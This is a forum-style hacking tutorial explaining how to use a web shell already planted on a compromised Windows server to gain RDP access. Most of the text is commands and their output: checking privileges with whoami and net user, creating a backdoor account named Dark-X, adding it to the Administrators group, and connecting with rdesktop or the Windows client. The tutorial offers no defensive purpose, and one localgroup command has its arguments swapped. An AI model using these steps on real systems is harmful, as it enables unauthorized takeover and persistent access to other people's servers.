Windows Rooting Tutorial

1. windows Rooting System or how to gain RDP Access.
2.  
3.  
4.  
5.  
6. Well this is diffirent from *Unix process there we use exploit here we use only commands
7. and yes if we are not able to execute those commands we can try some alternativ but still the possibilitys to work are really low....Am gonna explane why a bit later.....
8.  
9.  
10. What we need:
11. -Shell atteched on Some Site
12. -Server must be runing on Windows OS
13.  
14.  
15. We access our shell and go to the command console and we frist gonna check who we are:
16. Code:
17.  
18.  
19. whoami
20.  
21.  
22. This command is to check with what user we are running and its can show us like:
23. Code:
24.  
25.  
26. Administrator or SystAdmin
27.  
28.  
29. Thats good we are running like administrator cool letz see how many users have on the server:
30. Code:
31.  
32.  
33. net user
34.  
35.  
36. And we gonna see something like :
37. Code:
38.  
39.  
40. C:\Users\Administrator>net user
41.  
42.  
43. \\SERVER **********
44.  
45.  
46. ----------------------------------------------------------
47. Administrator Guest Remote
48. __________________________________
49. Command Successfully executed.
50.  
51.  
52. So this means that there are like 3 users on the this server :
53. Administrator,Guest,Remote
54. So we can try to add a new user ex: Dark-X
55. Code:
56.  
57.  
58. net user Dark-X /add
59.  
60.  
61. This command is for adding user with password:
62. Code:
63.  
64.  
65. net user Username Password /add
66.  
67.  
68. when we execute this command we will get some windows saying:
69. Code:
70.  
71.  
72. ___________________________
73. Command Successfully executed.
74.  
75.  
76. now letz check:
77. Code:
78.  
79.  
80. net user Dark-X
81.  
82.  
83. Will display something like this:
84. Code:
85.  
86.  
87. Username: Dark-X
88. Name: Dark-X
89.  
90.  
91. Last Time Online: XX:XX:XX-XX/XX
92. Local Group: *User
93.  
94.  
95. So we are in group user we need to be in Administrator or Remote to connect on Remote Desktop Connection so we type:
96. Code:
97.  
98.  
99. Net localgroup Dark-X Administrator /add
100.  
101.  
102. and we will see agaen this line:
103. Code:
104.  
105.  
106. Command Successfully executed.
107.  
108.  
109. If we see this that means that we have added our user to Administrators group now we can try to connect on RDP and access the whole server.
110. Windows RDP Starting:
111. Code:
112.  
113.  
114. Start Menu=>All Programs=>Accessories=>Remote Desktop Connection
115.  
116.  
117. Linux:
118. Code:
119.  
120.  
121. Open Terminal write: rdesktop -u Username -p Password IP
122.  
123.  
124. or
125. Code:
126.  
127.  
128. rdesktop IP